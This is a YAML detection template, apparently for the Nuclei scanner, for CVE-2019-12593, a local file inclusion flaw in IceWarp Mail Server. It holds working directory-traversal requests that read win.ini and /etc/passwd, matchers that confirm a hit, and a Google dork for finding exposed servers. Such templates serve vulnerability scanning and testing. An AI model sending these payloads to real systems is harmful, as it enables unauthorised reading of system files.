30 lines
1.1 KiB
YAML
30 lines
1.1 KiB
YAML
id: CVE-2019-12593
|
|
|
|
info:
|
|
name: IceWarp <=10.4.4 - Local File Inclusion
|
|
author: pikpikcu
|
|
severity: high
|
|
description: IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.
|
|
tags: cve,cve2019,lfi
|
|
reference: https://github.com/JameelNabbo/exploits/blob/master/IceWarp%20%3C%3D10.4.4%20local%20file%20include.txt
|
|
|
|
# reference: https://nvd.nist.gov/vuln/detail/CVE-2019-12593
|
|
# Google Dork:-Powered By IceWarp 10.4.4
|
|
# Vendor Homepage: http://www.icewarp.com
|
|
# Software Link: https://www.icewarp.com/downloads/trial/
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini'
|
|
- '{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
words:
|
|
- "[intl]"
|
|
- "root:x:0" |